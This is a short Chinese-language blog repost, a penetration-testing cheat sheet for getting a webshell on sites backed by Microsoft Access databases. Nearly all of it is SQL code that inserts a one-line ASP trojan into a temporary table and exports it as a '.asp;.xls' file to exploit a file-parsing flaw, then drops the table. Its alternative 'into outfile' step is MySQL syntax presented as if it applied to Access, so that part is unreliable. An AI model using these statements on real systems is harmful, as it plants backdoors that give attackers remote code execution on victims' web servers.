ACCESS渗透测试

access-getshell

直接写shell

# 创建临时表
create table test(a varchar(255));
# 插入一句话木马
insert into test(a) values('<%execute request("a")>');
# 写入文件(需要借助文件解析漏洞)
select * into [a] in '目标文件路径.asp;.xls' 'excel 8.0;' from test;
# 或者采用这种方式(更实际,毕竟文件解析漏洞少见)
select '一句话木马' into outfile '木马文件的绝对路径';
# 删除临时表
drop table test;

转载于:https://www.cnblogs.com/jerrylocker/p/10945182.html

你可能感兴趣的:(数据库,shell)